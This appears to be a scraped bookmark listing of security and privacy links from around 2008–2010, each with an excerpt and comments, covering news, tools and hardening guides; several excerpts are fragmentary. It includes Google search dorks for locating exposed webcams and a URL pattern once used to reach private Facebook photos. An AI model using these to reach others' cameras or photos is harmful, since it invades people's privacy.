http://parame.mwj.jp/blog/0273
Hacker News | How I Hacked Hacker News (with arc security advisory)
http://news.ycombinator.com/item?id=639976
How I Hacked Hacker News (with arc security advisory)
Dev-Team Blog - trois, drei, три, három!
http://blog.iphone-dev.org/post/126465561/trois-drei-h-rom
jailbreak iphone
RT @MuscleNerd: 3.0 JB for mac owners is now out http://is.gd/16t1c -- youtube issues fixed too! << Awesome [from http://twitter.com/robinhowlett/statuses/2241134783]
School used student laptop webcams to spy on them at school and home Boing Boing
http://www.boingboing.net/2010/02/17/school-used-student.html
The laptops issued to high-school students in the well-heeled Philly suburb have webcams that can be covertly activated by the schools' administrators, who have used this facility to spy on students and even their families. The issue came to light when the Robbins's child was disciplined for "improper behavior in his home" and the Vice Principal used a photo taken by the webcam as evidence. The suit is a class action, brought on behalf of all students issued with these machines.
According to the filings in Blake J Robbins v Lower Merion School District (PA) et al, the laptops issued to high-school students in the well-heeled Philly suburb have webcams that can be covertly activated by the schools' administrators, who have used this facility to spy on students and even their families. The issue came to light when the Robbins's child was disciplined for "improper behavior in his home" and the Vice Principal used a photo taken by the webcam as evidence. The suit is a class action, brought on behalf of all students issued with these machines. If true, these allegations are about as creepy as they come. I don't know about you, but I often have the laptop in the room while I'm getting dressed, having private discussions with my family, and so on. The idea that a school district would not only spy on its students' clickstreams and emails (bad enough), but also use these machines as AV bugs is purely horrifying.
if you borrow a laptop from your school or government, double check they're not spying on you. Scary post from Boing Boing about how one school in Philadelphia has been turning on the students' web cameras remotely to monitor "student behaviour". via stephen downes.
According to the filings in Blake J Robbins v Lower Merion School District (PA) et al, the laptops issued to high-school students in the well-heeled Philly suburb have webcams that can be covertly activated by the schools' administrators, who have used this facility to spy on students and even their families. Creepy!
See also /. discussion http://yro.slashdot.org/story/10/02/21/2010213/PA-School-Defends-Web-Cam-Spying-As-Security-Measure-Denies-Misuse
Top 20 Nginx WebServer Best Security Practices
http://www.cyberciti.biz/tips/linux-unix-bsd-nginx-webserver-security.html
Researchers hijack botnet, score 56,000 passwords in an hour - Ars Technica
http://arstechnica.com/security/news/2009/05/researchers-hijack-botnet-score-56000-passwords-in-an-hour.ars
410 financial institutions
Researchers hijack botnet, score 56,000 passwords in an hour - Ars Technica http://ow.ly/5eyt [from http://twitter.com/ChipRiley/statuses/1706638693]
“The Torpig botnet was hijacked by the good guys for ten days earlier this year before its controllers issued an update and took the botnet back. During that time, however, researchers were able to gain a glimpse into the kind of information the botnet gathers as well as the behavior of Internet users who are prone to malware infections. ” – via nelson
Break through annoying overseas sites that block Japan with "Hotspot Shield" : Oshiete-kun.net
http://www.oshiete-kun.net/archives/2009/04/0905-144.html
) region set to AL; everything else left as the usual credit card info and address
Hotspot Shield
Five Best VPN Tools - Vpn - Lifehacker
http://lifehacker.com/5487500/five-best-vpn-tools
How is session management done in web apps for mobile phones? - ockeghem (Hiroshi Tokumaru)'s diary
http://d.hatena.ne.jp/ockeghem/20090714/p1
What if someone made a list of questions for telling whether a contractor is competent?
Leave No Trace: How to Completely Erase Your Hard Drives, SSDs and Thumb Drives - Data wiping - Gizmodo
http://gizmodo.com/5489933/leave-no-trace-how-to-completely-erase-your-hard-drives-ssds-and-thumb-drives
Data Permanent Eraser
"With stories abounding of identity theft aided by information lifted from discarded storage devices, you want devices you no longer plan to use to have no usable information when they head out the door. Here's how to wipe them clean."
Leave No Trace: How to Completely Erase Your Hard Drives, SSDs and Thumb Drives - Data wiping
Graffiti Wall Distillation: Tourist Scams, 2005
http://www.ricksteves.com/graffiti/bestof_scams05.htm
n accosted many times, but never with success. Although I wouldn’t recommend this tactic to everyone, here’s my secret: If you are forced to walk somewhere dodgy, such as the Albayzin or Sacromonte areas of Granada in Spain (tiny thousand-year-old streets, a labyrinth where masked thieves — usually little punk kids — like to prey), one thing I’ve found that works is putting on the “Oh man, what have I done?!” face. This is the kind of face one may have as they are thinking to themselves: “Oh man, I shouldn’t have hit that last person so hard...I wonder if they’re dead?” Imagine it. It’s the face of a person who has absolutely cracked, gone off the deep end, and just killed someone. This may sound really weird, but trust me, if you wear
Interesting list of scams perpetrated on travelers. I always ask myself if I am just lucky or actually more careful -- apart from the occasional over-charging taxi, nothing has ever happened to me.
Cover yourself against travel scams
I-Hacked.com Taking Advantage Of Technology - Inside Programmable Road Signs
http://www.i-hacked.com/content/view/274/1/
How many times have you driven by an electronic road sign like one of these? This is the ADDCO portable sign. Today, you see what is on the inside, and how they are programmed to display important information.
this is how they did the zombies ahead thing
road sign programming
Schneier on Security: The Future of Ephemeral Conversation
http://www.schneier.com/blog/archives/2008/11/the_future_of_e.html
We type on, engrossed in conversation, forgetting we're being recorded and those recordings might come back to haunt us later. Oliver North learned this, way back in 1987, when messages he thought he had deleted were saved by the White House PROFS system, and then subpoenaed in the Iran-Contra affair. Bill Gates learned this in 1998 when his conversational e-mails were provided to opposing counsel as part of the antitrust litigation discovery process. Mark Foley learned this in 2006 when his instant messages were saved and made public by the underage men he talked to. Paris Hilton learned this in 2005 when her cell phone account was hacked, and Sarah Palin learned it earlier this year when her Yahoo e-mail account was hacked. ... Ephemeral conversation is dying. Cardinal Richelieu: "If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged."
"Conversation used to be ephemeral. Whether face-to-face or by phone, we could be reasonably sure that what we said disappeared as soon as we said it. Organized crime bosses worried about phone taps and room bugs, but that was the exception. Privacy was just assumed. This has changed. We chat in e-mail, over SMS and IM, and on social networking websites like Facebook, MySpace, and LiveJournal. We blog and we Twitter. These conversations -- with friends, lovers, colleagues, members of our cabinet -- are not ephemeral; they leave their own electronic trails. We know this intellectually, but we haven't truly internalized it. We type on, engrossed in conversation, forgetting we're being recorded and those recordings might come back to haunt us later."
When he becomes president, Barack Obama will have to give up his BlackBerry. Aides are concerned that his unofficial conversations would become part of the presidential record, subject to subpoena and eventually made public as part of the country's historical record.
But as technology makes our conversations less ephemeral, we need laws to step in and safeguard ephemeral conversation.
"The younger generation chats digitally, and the older generation treats those chats as written correspondence. ... until we have a Presidential election where both candidates have a complete history on social networking sites from before they were teenagers -- we aren't fully an information age society." (via Oblinks)
BBC NEWS | Europe | Mystery of lost US nuclear bomb
http://news.bbc.co.uk/2/hi/europe/7720049.stm
Main article on the 4th bomb in BBC by Gordon Corera "The United States abandoned a nuclear weapon beneath the ice in northern Greenland following a crash in 1968, a BBC investigation has found."
BBC NEWS | Technology | Serious security flaw found in IE
http://news.bbc.co.uk/2/hi/technology/7784908.stm
"Users of Microsoft's Internet Explorer are being urged by experts to switch to a rival until a serious security flaw has been fixed."
Schneier on Security: Software Problems with a Breath Alcohol Detector
http://www.schneier.com/blog/archives/2009/05/software_proble.html
Draeger, the manufacturer maintained that the system was perfect, and that revealing the source code would be damaging to its business. They were right about the second part, of course, because it turned out that the code was terrible.
A small note on how important it is to have access to the software we use in the judicial system
People surely are going to sue for this
Common Sense Internet Safety Survival Guide
http://www.commonsense.com/internet-safety-guide/
The Internet runs right through the middle of our kids' lives. It opens a world of entertainment and communication, but it also allows direct access to people and Web sites that can expose kids to age-inappropriate content and risky social contacts. At Common Sense Media, we believe in media sanity, not censorship. And since we can't always cover our kids' eyes, we have to teach them how to see. The information here will help your kids stay Internet safe and smart. Click on the links below to find out what every parent should know about how our kids use the Internet.
Guide on what to check on Facebook, along with other stuff; a good resource for parents, and covers movies and books too
"Making Sense of Privacy and Publicity"
http://www.danah.org/papers/talks/2010/SXSW2010.html
dannah boyd keynote notes from sxsw2010 via monstro
Random Key Generator
http://randomkeygen.com/
password
A variety of random keys that can be used for passwords, encryption keys, etc. - all randomly generated
Here you will find a variety of random keys that can be used for passwords, encryption keys, etc. - all randomly generated, just for you! Simply refresh this page for a completely new set of keys.
ProtectKids.com - Making the Internet Safer for Children and Families
http://protectkids.com/
Help students protect themselves from online predators, cyberbullying, and sexual abuse
This website has information and links covering everything from internet dangers to how to report a web crime. The site also gives tips for parents and has links to other safety sites.
Worst. Bug. Ever. | Ed Burnette’s Dev Connection | ZDNet.com
http://blogs.zdnet.com/Burnette/?p=680
(This is old, just saving it for later.)
execute *every* SMS as root... so handy
"when the phone booted it started up a command shell as root and sent every keystroke you ever typed on the keyboard from then on to that shell."
interesting gphone bug
Don't tell me they thought of that as being a feature...
skipfish - Project Hosting on Google Code
http://code.google.com/p/skipfish/
A fully automated, active web application security reconnaissance tool. Key features: * High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint - easily achieving 2000 requests per second with responsive targets. * Ease of use: heuristics to support a variety of quirky web frameworks and mixed-technology sites, with automatic learning capabilities, on-the-fly wordlist creation, and form autocompletion. * Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors.
@z0nbi What does the #security community think of this announcement: http://code.google.com/p/skipfish/ ~ A Google web app security scanner.
Security e-Book
http://ebook.sikurezza.org/wiki/Pagina_principale
Based on an idea by Giuseppe "Gippa" Paternò, an online book about security architectures and their implementations.
Exposing Flash Application Vulnerabilities with SWFScan - The HP Security Laboratory
http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2009/03/20/exposing-flash-application-vulnerabilities-with-swfscan.aspx
HP SWFScan is a free Windows-based security tool to help developers find and fix security vulnerabilities in applications developed with the Adobe Flash Platform. The tool is the first of its kind to decompile applications developed with the Flash platform and perform static analysis to understand their behaviors. This helps developers without security backgrounds identify vulnerabilities hidden within the application which cannot be detected with dynamic analysis methods.
Free decompiler for Flash / Flex (SWF) applications that also searches for vulnerabilities and security holes, information disclosure...
Video: Hacker war drives San Francisco cloning RFID passports - Engadget
http://www.engadget.com/2009/02/02/video-hacker-war-drives-san-francisco-cloning-rfid-passports/
Hacker war drives San Francisco cloning #RFID passports http://j.mp/cQh2ro
SkipfishDoc - skipfish - Project documentation - Project Hosting on Google Code
http://code.google.com/p/skipfish/wiki/SkipfishDoc
an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a r
Software for testing web applications, including for security
"... skipfish - web application security scanner ..."
Security checks and link extraction for third-party, plugin-based content (Flash, Java, PDF, etc).
Official Google Data APIs Blog: Bringing OpenID and OAuth Together
http://googledataapis.blogspot.com/2009/01/bringing-openid-and-oauth-together.html
Every OAuth provider should encapsulate OAuth authorization inside OpenID. Better UX, lesser redirects http://bit.ly/7qbfPB
OAuth-enabled APIs su
Your Gmail Account is Now An OpenID
http://www.techcrunch.com/2008/10/29/your-gmail-account-is-now-an-openid/
RT @tweetlicius: Your Gmail Account is Now An OpenID - http://tcrn.ch/aAxVXq
You may not know it, but you probably have an OpenID. If you have a Yahoo account, you have an OpenID. If you have a Windows Live account, you will soon have an OpenID. And today, if you have a Google e-mail account, you can also start using your Gmail address as an OpenID. By joining the OpenID movement, Google completes the trifecta and adds all of its Gmail users to the hundreds of millions of Yahoo and Windows Live accounts that can also be used as a single login for any Website that accepts OpenID. While Google is more than happy to become an issuer of OpenIDs, what is not so clear is whether it will accept other OpenIDs for people who want to sign up for Google services.
Google appears to be an OpenID “provider,” not a “relying party.” In other words, you cannot sign into Google with your Yahoo account. But this still helps the OpenID movement as a whole because it gives smaller sites more incentive to join as “relying parties.” Among the first sites to accept Gmail accounts for sign in are Zoho and Plaxo.
Art of the Steal: On the Trail of World’s Most Ingenious Thief | Magazine
http://www.wired.com/magazine/2010/03/ff_masterthief_blanchard/all/1
even take driving tests, apply for passports, or enroll in college classes under one of his many aliases: J
a real-life master criminal
The Raw Story | Whistleblower: NSA spied on everyone, targeted journalists
http://rawstory.com/news/2008/Whistleblower_Bushs_NSA_targeted_reporters_0121.html
Former National Security Agency analyst Russell Tice, who helped expose the NSA's warrantless wiretapping in December 2005, has now come forward with even more startling allegations. Tice told MSNBC's Keith Olbermann on Wednesday that the programs that spied on Americans were not only much broader than previously acknowledged but specifically targeted journalists.
Article was updated. One time there were military helicopters that were hovering directly over me and Kenneth's apartments in Bowling Green. I went to tell Francis Gardler what had just happened to me and he just dismissed me as paranoid and crazy. Of course, military helicopters really did hover directly over our apartments. That's about the time that I started losing respect for Gardler.
Whether you were in Kansas and never made foreign communications at all, they monitored all communications, says whistleblower Russell Tice
AVG Antivirus and Security Software - AVG Rescue CD
http://www.avg.com/us-en/avg-rescue-cd
A powerful toolset for rescue & repair of infected machines.
The AVG Rescue CD is a powerful must-have toolkit for the rescue and repair of infected machines. It provides essential utilities for system administrators and other IT professionals and includes the following features: * Comprehensive administration toolkit * System recovery from virus and spyware infections * Suitable for recovering MS Windows and Linux operating systems (FAT32 and NTFS file systems) * Ability to perform a clean boot from CD or USB stick * Free support and service for paid license holders of any AVG product * FAQ and Free Forum self-help support for AVG Free users
Accessing a private server from Firefox using ssh dynamic forwarding - 射撃しつつ前転
http://d.hatena.ne.jp/tkng/20090621/1245539830
ssh has a feature called dynamic forwarding. With it, ssh presents itself to the application as a SOCKS proxy, while the traffic from there to the ssh destination is carried encrypted.
Accessing a private server from Firefox using ssh dynamic forwarding - 射撃しつつ前転: ssh has a feature called dynamic forwarding. With it, ssh presents itself to the application as a SOCKS proxy, while the traffic from there to the ssh destination is carried encrypted. That alone may not make clear how it differs from ordinary tunneling, but with dynamic forwarding there is no need to specify the forwarded port, which is presumably why it is called dynamic. For example, a development server in office A... ssh, firefox
5 Plugins to Keep WordPress Secure
http://www.dailyblogtips.com/5-plugins-to-keep-wordpress-secure/
Some days ago a reader asked Daniel for advice when his blog got hacked. Daniel recommended some good security measures to keep WordPress safe. In case you missed it, read the post here: What if my WordPress Blog Got Hacked with the Google Redirect?
pwnat - NAT to NAT client-server communication
http://samy.pl/pwnat/
To check out
pwnat, pronounced "poe-nat", is a tool that allows any number of clients behind NATs to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. The server does not need to know anything about the clients trying to connect. Simply put, this is a proxy server that works behind a NAT, even when the client is behind a NAT, without any 3rd party. There is no middle man, no proxy, no 3rd party, no UPnP/STUN/ICE required, no spoofing, and no DNS tricks. More importantly, the client can then connect to any host or port on any remote host or to a fixed host and port decided by the server.
pwnat - Serverless NAT to NAT (UDP hole punching for everybody, yay)
Featured Download: AlwaysVPN Takes U.S.-Only Sites International
http://lifehacker.com/5081829/alwaysvpn-takes-us+only-sites-international
Featured Download: AlwaysVPN Takes U.S.-Only Sites International for HULU, etc from US
Coding Horror: Top 25 Most Dangerous Programming Mistakes
http://www.codinghorror.com/blog/2009/01/top-25-most-dangerous-programming-mistakes.html
Coding technique without error
guide to 25 of the most dangerous programming mistakes - a must read!
outsider
Make Firefox Remember Passwords without a Bookmarklet
http://cybernetnews.com/2009/02/13/firefox-remember-passwords/
How I’d Hack Your Weak Passwords - Passwords - Lifehacker
http://lifehacker.com/5505400/how-id-hack-your-weak-passwords
Security
f you invited me to try and crack your password, you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?
10-places-not-to-use-your-debit-card: Personal Finance News from Yahoo! Finance
http://finance.yahoo.com/banking-budgeting/article/109125/10-places-not-to-use-your-debit-card?mod=bb-checking_savings
Whilst bank cards and money cards may appear virtually the same, not all plastic is identical.
Privacy: Whspr Lets Anyone Send You an Email Without Revealing Your Email Address
http://lifehacker.com/5141360/whspr-lets-anyone-send-you-an-email-without-revealing-your-email-address
Web application whspr! creates a private feedback form that you can share on services like Twitter without revealing your real email address. Simply enter your real email address, a description of what the form is for, and the number of days you want the form to be active. Once completed, you'll be given a URL to the form to share with others. This application could be useful for job postings, blog contests or giveaways—pretty much anything where you'd like email responses but don't want to give out an email address. If you want to send private messages instead of receiving them, check out previously mentioned Whisper Bot, or you can send your awkward messages anonymously with NiceCritic.
Spotify vs OllyDbg
http://www.steike.com/code/spotify-vs-ollydbg/
sudo dtrace -n 'syscall::write*:entry /execname == "Spotify" && arg0 == 2/ { trace(copyinstr(arg1)); ustack(); }'
"Spotify for Windows contains code so awesome that [Windows debugger] OllyDbg can't look at it without crashing."
Why No More 9/11s? (consolidated version for printout) - By Timothy Noah - Slate Magazine
http://slate.com/id/2213025
Amid the many uncertainties loosed by the al-Qaida attacks on Sept. 11, 2001, one forecast seemed beyond doubt: Islamist terrorists would strike the United States again—and soon.
Clear overview of the prevailing theories about why no major attacks have occurred since 9/11/01.
How To: Protect Your Windows PC from the Conficker Worm
http://lifehacker.com/5192415/protect-your-windows-pc-from-the-conficker-worm
People on windows PCs without updated virus software should probably take a look at this http://is.gd/pVSc [from http://twitter.com/standardman/statuses/1427842931]
TidBITS Safe Computing: What I Learned from Having My Laptop Stolen
http://db.tidbits.com/article/10165
anti theft, etc
Someday, somewhere, somehow your computer will be gone. It will be stolen, or the hard drive will self-destruct, or it will be hit by a meteor. While the latter would at least provide you with an excellent story, assuming you weren't using it at the time, having your laptop stolen, as mine was recently, just plain sucks. However, I did manage to learn a few things in the wake of disaster, and wanted to take the opportunity to share them with you here.
Three things are lost with a computer's theft: hardware, data, and privacy. I'll let others deal with the emotional aspects of loss, and instead focus on the practical ones.
How to protect your MacBook in case of theft
Do We Need a New Internet? - NYTimes.com
http://www.nytimes.com/2009/02/15/weekinreview/15markoff.html
There is a growing belief among engineers and security experts that Internet security and privacy have become so maddeningly elusive that the only way to fix the problem is to start over. What a new Internet might look like is still widely debated, but one alternative would, in effect, create a “gated community” where users would give up their anonymity and certain freedoms in return for safety.
Problems with privacy are making experts think about a new internet. Question to the class: Is it possible?
"There is a growing belief among engineers and security experts that Internet security and privacy have become so maddeningly elusive that the only way to fix the problem is to start over." "A more secure network is one that would almost certainly offer less anonymity and privacy."
"What a new Internet might look like is still widely debated, but one alternative would, in effect, create a “gated community” where users would give up their anonymity and certain freedoms in return for safety. Today that is already the case for many corporate and government Internet users. As a new and more secure network becomes widely adopted, the current Internet might end up as the bad neighborhood of cyberspace. You would enter at your own risk and keep an eye over your shoulder while you were there"
Do We Need a New Internet? - NYTimes.com
http://www.nytimes.com/2009/02/15/weekinreview/15markoff.html?_r=1
Do We Need a New Internet?
Do We Need a New Internet? http://tinyurl.com/cdgwv4 via NYT [from http://twitter.com/bibliothekarin/statuses/1218288148]
VaultPress
http://vaultpress.com/
An automated backup service for WP
WordPress multi-cloud backups. http://vaultpress.com/ – René Stalder (Nachtmeister) http://twitter.com/Nachtmeister/statuses/11632623041
Top 8 Web 2.0 Security Threats - ReadWriteWeb
http://www.readwriteweb.com/archives/top_8_web_20_security_threats.php
Programmatic interfaces of Web 2.0 applications let hackers automate attacks easier. In addition to brute force and CSRF attacks, other examples include the automated retrieval of a large amount of information and the automated opening of accounts. Anti-automation mechanisms like Captchas can help slow down or thwart these types of attacks.
The Flash Blog » AMFPHP Security Basics
http://theflashblog.com/?p=419
security regarding amfphp
How I’d Hack Your Weak Passwords - Passwords - Lifehacker
http://lifehacker.com/5505400/how-id-hack-your-weak-passwords?skyline=true&s=i
How Your Password Could Be Hacked: http://j.mp/9LPHl1 #it
Internet standards expert, CEO of web company iFusion Labs, and blogger John Pozadzides knows a thing or two about password security—and he knows exactly how he'd hack the weak passwords you use all over the internet.
窓の杜 - [NEWS] Free integrated security suite "COMODO Internet Security" gets a Japanese localization
http://www.forest.impress.co.jp/article/2009/05/18/comodo_internet_security.html
On the 13th (local time), Comodo Security Solutions, Inc. of the US released v3.9.95478.509 of its free integrated security suite "COMODO Internet Security". This version adds volunteer translations of the menus and other items, newly supporting 19 languages including Japanese. When the editorial staff tried it, almost every item was in Japanese apart from some explanatory text on the main screen and the help file, which remain in English, so the barrier to using it is now very low.
Free integrated security suite that supports 64-bit Vista.
antivirus, Japanese
Easily generate an .htaccess that blocks IPs other than mobile handsets: "Mobile IP htaccess Maker" - HTMLタグボード
http://www.dspt.net/tools/mobile_ip/generator.php
Generates an .htaccess that allows only the various mobile carriers
W32.Downadup Removal Tool | Symantec
http://www.symantec.com/security_response/writeup.jsp?docid=2009-011316-0247-99
Link to the tool for removing the Conficker worm
Midnight Research Labs - Depant your network
http://midnightresearch.com/pages/depant-your-network/
The tool is called depant ((DE)fault (PA)ssword (N)etwork (T)ool). Depant works by downloading a default password list, and then mapping out the local network to see what open services are available. Once it has a list of services, it will test each service for default passwords. Once it’s gone through each of the services, depant will determine the fastest service (as recorded in phase one) and use it to perform an optional second phase of tests with a larger (user-supplied) set of default users/passwords.
depant
Definitive PHP security checklist | sk89q
http://www.sk89q.com/2009/08/definitive-php-security-checklist/
Schneier on Security: The Seven Habits of Highly Ineffective Terrorists
http://www.schneier.com/blog/archives/2008/10/the_seven_habit.html
Most counterterrorism policies fail, not because of tactical problems, but because of a fundamental misunderstanding of what motivates terrorists in the first place. If we're ever going to defeat terrorism, we need to understand what drives people to become terrorists in the first place.
"Conventional wisdom holds that terrorism is inherently political, and that people become terrorists for political reasons...Max Abrahms, a predoctoral fellow at Stanford, argues that this model is wrong, and discusses seven habits observed in terrorist groups that contradict the theory that terrorists are political maximizers...Abrahms has an alternative model to explain all this: People turn to terrorism for social solidarity."
Abrahms has an alternative model to explain all this: People turn to terrorism for social solidarity. He theorizes that people join terrorist organizations worldwide in order to be part of a community, much like the reason inner-city youths join gangs in the United States. The evidence supports this. [[Some of the comments are very intriguing as well. —Ed.]]
Most counterterrorism policies fail, not because of tactical problems, but because of a fundamental misunderstanding of what motivates terrorists in the first place—by Bruce Schneier
BREAKING: New Gmail Security Flaw. More Domains Get Stolen! | MakeUseOf.com
http://www.makeuseof.com/tag/breaking-gmail-security-flaw-more-domains-get-stollen/
As many of you already know on November 2nd, MakeUseOf.com’s domain was stolen from us. It took us about 36 hours to get the domain back. As we have pointed out earlier the hacker somehow managed to get access to my Gmail account and from there to our GoDaddy account, unlock the domain and move it to another registrar.
Run sketchy files inside the "Sandboxie" virtual area : Oshiete-kun.net
http://www.oshiete-kun.net/archives/2008/11/sandboxie.html
Hiromitsu Takagi@home diary - Do not use the new Hatena Bookmark registration bookmarklet
http://takagi-hiromitsu.jp/diary/20081125.html#p01
"Is a bookmarklet allowed to go that far?" Indeed, at a time when the boundaries between sites, and between online and offline, are blurring, this is a hard question.
Obvious, but it is dangerous unless the browser itself can display the URI.
The point raised is that performing authentication operations on an external site through an in-page window opened with JavaScript is probably out of bounds, via delicious/spiegel
Ksplice » Much ado about NULL: Exploiting a kernel NULL dereference - System administration and software blog
http://blog.ksplice.com/2010/04/exploiting-kernel-null-dereferences/
WEEK 12 -- 04/14/2010
Much ado about NULL: Exploiting a kernel NULL dereference
National Security Agency Releases History of Cold War Intelligence Activities
http://www.gwu.edu/~nsarchiv/NSAEBB/NSAEBB260/index.htm
Excised
http://www.gwu.edu/~nsarchiv/NSAEBB/NSAEBB260/index.htm Very interesting history of a once "black" agency.
Say Goodbye to BlackBerry? If Obama Has to, Yes He Can - NYTimes.com
http://www.nytimes.com/2008/11/16/us/politics/16blackberry.html
Security concerns and record-keeping laws mean that Barack Obama is unlikely to become the first e-mailing president.
Obama may need to give up his BlackBerry to become president.
"For years, like legions of other professionals, Mr. Obama has been all but addicted to his BlackBerry. The device has rarely been far from his side — on most days, it was fastened to his belt — to provide a singular conduit to the outside world as the bubble around him grew tighter and tighter throughout his campaign."
Given how important it is for him to get unfiltered information from as many sources as possible, he will miss the freedom of email
Product Details - Sectéra® Edge™ SME PED - Overview
http://www.gdc4s.com/content/detail.cfm?item=32640fd9-0213-4330-a742-55106fbaff32
The Sectéra® Edge™ smartphone converges secure wireless voice and data by combining the functionality of a wireless phone and PDA — all in one easy-to-use handheld device. Developed for the National Security Agency’s Secure Mobile Environment Portable Electronic Device (SME PED) program, the Sectéra Edge is certified to protect wireless voice communications classified Top Secret and below as well as access e-mail and websites classified Secret and below. The Sectéra Edge is the only SME PED that switches between an integrated classified and unclassified PDA with a single key press.
General Dynamics C4 Systems is a leading integrator of network-centric command, control, communication and computing solutions from space to ground - core to edge. The company’s focus is on engineering and integrating secure communication, information and technology solutions that facilitate the delivery of relevant information to speed the decision cycle, so our customers can see, hear, decide and act with absolute confidence - faster and more effectively.
Obama's new Blackberry - Sectera Edge by General Dynamics, the only smart phone NSA rated for Top Secret communications. http://is.gd/fZqn [from http://twitter.com/eighteyes/statuses/1139490924]
Obama's new NSA-approved phone
Secure Your Vista PC in 10 Easy Steps - Business Center - PC World
http://www.pcworld.com/businesscenter/article/156019/secure_your_vista_pc_in_10_easy_steps.html
10+ Free Web Application Security Testing Tools
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
n detect: * File handling errors (Local and remote include/require, fopen, readfile…) * Database, XSS, LDAP and CRLF injections (HTTP response splitting, session fixation…) * Command execution detection (eval(),
Netsparker Community Edition (Windows), Websecurify (Windows, Linux, Mac OS X), Wapiti (Windows, Linux, Mac OS X), N-Stalker Free Version (Windows), Skipfish (Windows, Linux, Mac OS X), Scrawlr (Windows), x5s (Windows), Exploit-Me (Windows, Linux, Mac OS X), WebScarab (Windows, Linux, Mac OS X), Acunetix Free Version (Windows)
Hiromitsu Takagi@home diary - Switched from "NoScript" to "RequestPolicy"
http://takagi-hiromitsu.jp/diary/20090531.html#p01
NoScript is fine, though. It would be hard for ordinary users to use. When a site I don't normally visit needs JavaScript, I just use Chrome or Safari, so it is not a problem for me.
Light Blue Touchpaper » Blog Archive » New Facebook Photo Hacks
http://www.lightbluetouchpaper.org/2009/02/11/new-facebook-photo-hacks/
e session cookies for every photo request, but we’ll assume this is impractical giv
Last March, Facebook caught some flak when some hacks circulated showing how to access private photos of any user. These were enabled by egregiously lazy design: viewing somebody’s private photos simply required determining their user ID (which shows up in search results) and then manually fetching a URL of the form: www.facebook.com/photo.php?pid=1&view=all&subj=[uid]&id=[uid] This hack was live for a few weeks in February, exposing some photos of Facebook CEO Mark Zuckerberg and (reportedly) Paris Hilton, before the media picked it up in March and Facebook upgraded the site. Instead of using properly formatted PHP queries as capabilities to view photos, Facebook now verifies the requesting user against the ACL for each photo request. What could possibly go wrong? Well, as I discovered this week, the photos themselves are served from a separate content-delivery domain, leading to some problems which
9000, which can be searched in about 45 minutes using one script. This is also easily parallelisable, given that we can query any of the mirrored photo servers in the
SMAP's risk communication
http://anond.hatelabo.jp/20090604074650
How to communicate something that has already happened so that it is received positively
Megaupload auto-fill captcha for Greasemonkey
http://userscripts.org/scripts/show/38736
Firefox plugin that recognizes captchas, with links to the source code.
OCR in javascript
Auto-fills the megaupload captchas and optionally auto-starts download
neural-net OCR in javascript
Google Code Blog: Google OpenID API - taking the next steps
http://google-code-updates.blogspot.com/2009/05/google-openid-api-taking-next-steps.html
Coding Horror: So You'd Like to Send Some Email (Through Code)
http://www.codinghorror.com/blog/2010/04/so-youd-like-to-send-some-email-through-code.html
Extra setup required for your app to send email. Some tips on how to get that going, check that you have what you need, and test it's working
Just some tidbits to keep around in case I end up writing an smtp server on a side job I'm considering
Your PasswordCard
http://passwordcard.org/
A PasswordCard is a credit card-sized card you keep in your wallet, which lets you pick very secure passwords for all your websites, without having to remember them! You just keep them with you, and even if your wallet does get stolen, the thief will still not know your actual passwords.
* Don't read along with your finger, or the smudge will tell a thief where your password is. * Keep your PasswordCard on your person, don't leave it lying around near your computer. * Clear your browser cache and history after printing this page.
10 tips for sensible systems administration
http://www.ibm.com/developerworks/aix/library/au-sensiblesysadmin/index.html
Benjamin Franklin: scientist, scholar, statesman, and . . . systems administrator? Yes, 200 years or so before the birth of UNIX®, Franklin scribed sage advice to keep systems humming. Here are 10 of Franklin's more notable tips.
Fun and instructive article in which a series of Benjamin Franklin's reflections are applied to systems administration.
Anatomy of a Subtle JSON Vulnerability
http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerability.aspx
Resources that emit JSON arrays risk data theft
Your Mom’s Guide to Those Facebook Changes, and How to Block Them
http://gigaom.com/2010/04/22/your-moms-guide-to-those-facebook-changes-and-how-to-block-them/
Changes to Facebook and privacy
Facebook launched some fairly impressive new features and services at its recent f8 conference, but some of them were also more than just a little scary. Since a lot of what the company talked about was introduced in either “developer speak” — involving terms like API [...]
Use Google To Hack Into A Secrect World - Borntechie
http://www.borntechie.com/entry/use-google-to-hack-into-a-secrect-world/
inurl:”viewerframe?mode=motion”
intitle:Live View / AXIS
?intitle:index.of?mp3 Linkin Park
“?intitle:index.of?mp3 Linkin Park“
Interior-Minister-Speak: Schäuble's Little Dictionary | Germany | News on ZEIT ONLINE
http://www.zeit.de/online/2009/04/neusprech-schaeuble-lexikon
A dictionary of terms from security debates and what they actually mean.
How can restrictions on freedom be sold as a gain? By obscuring them linguistically. A catalogue of the Newspeak of domestic security.
Examines the words used to justify the ever-new restrictions on personal freedoms passed in recent years in the course of the "war on terror" and the strengthening of the defence-ready state.
Wonderful and dangerous, how euphemisms are used to describe police-state actions. Example: "final rescue shot" instead of shoot-to-kill order/permission to kill.
Featured Windows Download: Axence NetTools Is Advanced Network Monitoring Tool
http://lifehacker.com/5092070/axence-nettools-is-advanced-network-monitoring-tool
Axence NetTools Is Advanced Network Monitoring Tool - Windows - Lifehacker
Windows only: Free application Axence NetTools is a comprehensive suite of networking tools for your PC, including a network scanner, inbound/outbound connection monitor (NetStat), port scanner, and other network and bandwidth measuring tools. NetTools is very similar in ways to previously mentioned network monitors like Look@Lan, but if you want to get elbow deep in your network, it's another great option to add to your toolbox. Axence NetTools is a free download, Windows only.
livedoor Data Hotel Patrol: free server and network monitoring service
http://patrol.datahotel.ne.jp/
Can monitor URLs.
This looks good.
livedoor's server monitoring service, free.
September 8, 2008: Data Hotel Patrol OPEN. livedoor, which operates a data center, has started a free server monitoring service. No special software needs to be installed, so you can start monitoring servers easily right away.
Police delete London tourists' photos 'to prevent terrorism' | UK news | guardian.co.uk
http://www.guardian.co.uk/uk/2009/apr/16/police-delete-tourist-photos
Klaus Matzka and his teenage son Loris took several photographs of some of the city's sights, including the famous red double-decker buses… But the tourists have said they had to return home to Vienna without their holiday pictures after two policemen forced them to delete the photographs from their cameras in the name of preventing terrorism.
